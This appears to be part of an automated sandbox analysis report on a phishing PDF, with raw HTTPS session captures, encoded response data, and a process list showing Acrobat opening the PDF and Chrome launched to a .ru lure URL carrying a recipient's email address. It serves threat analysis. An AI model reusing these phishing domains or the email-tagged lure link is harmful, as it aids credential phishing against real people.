                                                                2025-01-07 21:36:30 UTC1277INData Raw: 61 49 35 53 63 6f 64 32 62 4a 64 77 65 46 2b 5a 64 70 71 54 59 4b 42 6a 6b 34 4b 43 6e 57 78 37 69 47 65 4e 59 33 4b 30 6b 4a 57 74 64 72 57 4b 73 72 71 48 66 4c 6d 30 72 61 47 42 69 38 4b 55 68 59 2f 47 6c 70 4b 34 6c 4a 57 64 71 4d 54 52 71 71 76 47 79 72 37 4d 73 5a 50 47 30 4d 76 53 30 61 37 4c 71 61 75 76 34 64 58 66 30 4d 4c 6e 35 2b 54 41 75 38 36 73 71 62 72 4d 35 74 58 4a 30 4e 54 76 34 39 76 4f 30 66 6f 41 2f 74 6a 4c 7a 76 44 51 32 39 44 31 32 4e 6e 57 2b 74 72 4b 33 77 7a 64 32 77 48 50 44 65 4d 45 30 51 6e 78 43 68 49 46 2b 52 45 58 36 42 67 68 42 50 6f 62 32 50 34 65 4a 2b 55 6f 43 78 73 45 42 41 55 6c 49 51 45 66 49 51 41 50 36 75 38 47 39 53 6f 38 43 52 6f 78 45 44 59 77 4c 67 45 6b 42 6a 73 30 4e 54 70 45 48 77 73 6c 50 51 73 4e 54 7a 52
                                                                Data Ascii: aI5Scod2bJdweF+ZdpqTYKBjk4KCnWx7iGeNY3K0kJWtdrWKsrqHfLm0raGBi8KUhY/GlpK4lJWdqMTRqqvGyr7MsZPG0MvS0a7Lqauv4dXf0MLn5+TAu86sqbrM5tXJ0NTv49vO0foA/tjLzvDQ29D12NnW+trK3wzd2wHPDeME0QnxChIF+REX6BghBPob2P4eJ+UoCxsEBAUlIQEfIQAP6u8G9So8CRoxEDYwLgEkBjs0NTpEHwslPQsNTzR
                                                                2025-01-07 21:36:30 UTC1369INData Raw: 30 35 54 4d 43 55 6c 4a 6a 51 36 56 6c 45 35 56 43 52 45 50 55 64 63 4d 7a 6f 37 52 55 31 4d 62 31 41 72 52 47 6c 49 5a 55 39 6f 5a 6a 4a 53 65 31 77 34 55 31 39 68 57 46 67 37 57 49 4a 69 65 47 56 59 59 34 74 32 66 57 79 46 61 49 4e 6b 68 45 5a 67 64 47 4a 30 6c 6e 4a 31 6a 6c 6c 39 6c 6c 32 4e 65 71 52 39 68 6e 71 58 70 33 5a 37 6e 6d 52 6a 6e 48 2b 69 72 6f 4f 54 66 48 43 4c 74 36 75 57 6a 62 74 75 69 36 79 5a 74 35 75 63 74 61 43 79 74 71 53 70 73 70 75 6d 72 5a 36 39 6e 4b 43 4f 71 59 36 6f 6c 62 4f 6e 6f 4a 61 78 74 70 66 58 73 75 44 4b 31 64 66 56 74 4e 4f 37 77 74 65 36 76 37 66 45 37 63 66 67 34 75 50 44 30 38 6e 4e 31 4d 4b 77 32 4f 6a 38 73 37 33 7a 38 4e 72 4e 30 76 59 44 39 39 33 68 31 41 54 6d 77 67 50 4c 2f 41 50 73 41 2b 38 45 44 4e 33 71
                                                                Data Ascii: 05TMCUlJjQ6VlE5VCREPUdcMzo7RU1Mb1ArRGlIZU9oZjJSe1w4U19hWFg7WIJieGVYY4t2fWyFaINkhEZgdGJ0lnJ1jll9ll2NeqR9hnqXp3Z7nmRjnH+iroOTfHCLt6uWjbtui6yZt5uctaCytqSpspumrZ69nKCOqY6olbOnoJaxtpfXsuDK1dfVtNO7wte6v7fE7cfg4uPD08nN1MKw2Oj8s73z8NrN0vYD993h1ATmwgPL/APsA+8EDN3q
                                                                2025-01-07 21:36:30 UTC1369INData Raw: 6b 70 50 45 41 5a 58 6d 46 52 5a 54 77 2f 52 69 4d 72 4e 7a 59 6d 4f 48 46 4c 4b 6a 4d 2f 58 69 38 33 55 32 51 79 64 6c 55 39 54 30 6f 2b 54 54 75 45 54 31 39 46 52 7a 71 47 68 59 42 63 65 45 5a 4c 69 45 4e 51 66 32 2b 44 59 45 32 5a 69 6d 69 48 63 35 4e 62 69 34 31 63 61 6c 57 53 6e 4b 57 67 57 6e 32 58 71 47 61 67 6f 35 79 77 59 35 31 7a 6c 49 65 44 74 62 46 76 69 4b 53 4e 6a 49 69 5a 71 33 4f 73 75 49 32 2b 72 34 47 33 76 72 61 67 6d 5a 32 74 74 38 75 69 6a 4e 4f 30 6c 4b 44 46 6f 4d 57 54 73 4c 75 70 6c 72 53 76 73 61 71 72 72 71 54 69 76 37 43 30 6f 4b 76 59 70 2b 58 6f 78 71 50 75 78 38 2f 45 39 37 66 4d 34 76 44 7a 36 64 76 2b 39 37 6e 7a 75 66 48 66 34 50 37 5a 33 39 58 45 30 2b 66 62 43 63 2f 39 37 41 38 53 36 2b 77 56 45 2f 62 5a 46 74 73 58 35
                                                                Data Ascii: kpPEAZXmFRZTw/RiMrNzYmOHFLKjM/Xi83U2QydlU9T0o+TTuET19FRzqGhYBceEZLiENQf2+DYE2ZimiHc5Nbi41calWSnKWgWn2XqGago5ywY51zlIeDtbFviKSNjIiZq3OsuI2+r4G3vragmZ2tt8uijNO0lKDFoMWTsLuplrSvsaqrrqTiv7C0oKvYp+XoxqPux8/E97fM4vDz6dv+97nzufHf4P7Z39XE0+fbCc/97A8S6+wVE/bZFtsX5
                                                                2025-01-07 21:36:30 UTC609INData Raw: 55 59 31 51 61 5a 43 4a 6b 51 30 59 32 61 57 41 6f 62 6b 68 73 5a 69 35 4c 54 31 4d 30 54 56 5a 77 66 47 63 35 50 6f 4e 41 57 45 36 44 62 31 64 54 67 57 4e 71 6a 45 65 4b 58 31 2b 53 5a 6d 64 78 6c 59 43 45 57 5a 57 45 6c 46 65 59 58 58 4b 4f 6e 35 36 64 6a 6d 43 50 65 33 6d 6b 6d 5a 5a 39 72 4b 69 77 73 71 78 7a 6e 4b 69 75 6a 4c 43 76 74 37 5a 36 68 72 79 34 74 70 43 33 65 58 71 67 77 4c 2b 35 6d 4d 43 6a 75 5a 6e 4a 75 4b 65 38 6d 71 61 6a 73 35 43 73 71 70 4c 52 31 74 7a 52 6d 4d 65 79 34 70 6e 69 34 4b 44 64 72 39 57 30 36 75 54 6f 34 71 62 75 37 64 4c 78 78 74 50 53 73 4f 4c 47 37 76 6e 55 75 75 6e 35 79 50 33 65 75 4d 45 47 37 67 4c 76 33 4e 48 45 39 4e 2f 63 44 50 67 52 44 52 48 54 46 73 73 57 41 68 4c 32 36 52 66 33 39 75 62 33 39 50 44 72 36 2f
                                                                Data Ascii: UY1QaZCJkQ0Y2aWAobkhsZi5LT1M0TVZwfGc5PoNAWE6Db1dTgWNqjEeKX1+SZmdxlYCEWZWElFeYXXKOn56djmCPe3mkmZZ9rKiwsqxznKiujLCvt7Z6hry4tpC3eXqgwL+5mMCjuZnJuKe8mqajs5CsqpLR1tzRmMey4pni4KDdr9W06uTo4qbu7dLxxtPSsOLG7vnUuun5yP3euMEG7gLv3NHE9N/cDPgRDRHTFssWAhL26Rf39ub39PDr6/


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.1649767104.18.95.414437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:30 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1702680241:1736281743:oHkGzRQEm0XBvPLraYKhN6D7o1wYu-qyAvxbR8tTHnY/8fe714c69d748c29/D9FHRl2BpZjliNMgDyuZOYbu5d2HtaznsinZzmz5MBU-1736285763-1.1.1.1-HKIOzuGxr_aQvzCfppdTbPN_zP_Hq18hKmQyJT3mFLCaJY32a.duvmYyY6NCi1it HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:30 UTC379INHTTP/1.1 404 Not Found
                                                                Date: Tue, 07 Jan 2025 21:36:30 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 7
                                                                Connection: close
                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                cf-chl-out: TgKJMeb6+VpLNVXEpnwO1uP5QKNZ08SNJcc=$iSiebmWaHfYgKJhK
                                                                Server: cloudflare
                                                                CF-RAY: 8fe715702cfb4399-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-07 21:36:30 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                Data Ascii: invalid


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.1649768172.67.166.744437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:30 UTC686OUTGET /bGrWZhCIwGpWkaIdpPnuUFfslfCeBeDRKHZKADKCNXZXAZCXUXPAEARFZCXPKUBHYWRMDRDNWLYJRUHRJRDKA HTTP/1.1
                                                                Host: oc2lywudcicvf3zkzgbl7dddmd3whscnaebpxb4wz1idtmlwhfeig.ivertoneym.ru
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Origin: https://sung.ethamoskag.ru
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://sung.ethamoskag.ru/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:31 UTC886INHTTP/1.1 200 OK
                                                                Date: Tue, 07 Jan 2025 21:36:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sjodb6b6S7Nam1FgTxfGN2qq76DFGN4mWxzd5r64jGWAm%2FPL8HukJXNnvMZ%2BTODHrrnmw7DnsJ1%2BQSlR2djnOeGfgQMoUXb2OwAtJmETbAnyJZTPvYx3wLAXfiP4UPMEHkfMawrYzQW0Jt2Lc3H032ACQqNIln7ol7KBCWr3OgboGxhTh4To2JOPoHHOxByQLb5zAhMy"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8fe71570ca6843df-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1649&rtt_var=628&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1264&delivery_rate=1770770&cwnd=243&unsent_bytes=0&cid=cc3e25c4be81dae7&ts=589&x=0"
                                                                2025-01-07 21:36:31 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                Data Ascii: 11
                                                                2025-01-07 21:36:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.1649775104.21.42.2084437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:32 UTC476OUTGET /bGrWZhCIwGpWkaIdpPnuUFfslfCeBeDRKHZKADKCNXZXAZCXUXPAEARFZCXPKUBHYWRMDRDNWLYJRUHRJRDKA HTTP/1.1
                                                                Host: oc2lywudcicvf3zkzgbl7dddmd3whscnaebpxb4wz1idtmlwhfeig.ivertoneym.ru
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:32 UTC892INHTTP/1.1 200 OK
                                                                Date: Tue, 07 Jan 2025 21:36:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=90%2FOgukPEi7IEU4J1zCPtCMymkb0An6PHmP5qKZ470EBFLJtaCm1frnyW1TqymktFZa4hMA%2FRNRB3wCabdQ27Wf0fP5uwU670mts9hQuTM4Y16wBwW%2Br%2BNVfw7mWpdh2PwPcMgTlMuvxWtebRSSsygaUHBK1gReJRQ8M0xutyk002GdxEOhUmfDgKqft6uD%2FPxdId%2Baf"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8fe7157b092a3350-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2024&min_rtt=2020&rtt_var=765&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1054&delivery_rate=1423001&cwnd=173&unsent_bytes=0&cid=ccedbb9d31acc22e&ts=577&x=0"
                                                                2025-01-07 21:36:32 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                Data Ascii: 11
                                                                2025-01-07 21:36:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:16:34:34
                                                                Start date:07/01/2025
                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Sburkholder.pdf"
                                                                Imagebase:0x7ff762d50000
                                                                File size:5'641'176 bytes
                                                                MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:16:34:35
                                                                Start date:07/01/2025
                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                Imagebase:0x7ff6d31d0000
                                                                File size:3'581'912 bytes
                                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:16:34:36
                                                                Start date:07/01/2025
                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1556 --field-trial-handle=1496,i,10005414482586613621,10229627965643939446,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                Imagebase:0x7ff6d31d0000
                                                                File size:3'581'912 bytes
                                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:15
                                                                Start time:16:35:56
                                                                Start date:07/01/2025
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sung.ethamoskag.ru/0cUrcw3/#Msburkholder@heartland-derm.com
                                                                Imagebase:0x7ff7f9810000
                                                                File size:3'242'272 bytes
                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:16
                                                                Start time:16:35:57
                                                                Start date:07/01/2025
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2004,i,17975387101299091926,15807436592221751878,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                Imagebase:0x7ff7f9810000
                                                                File size:3'242'272 bytes
                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                No disassembly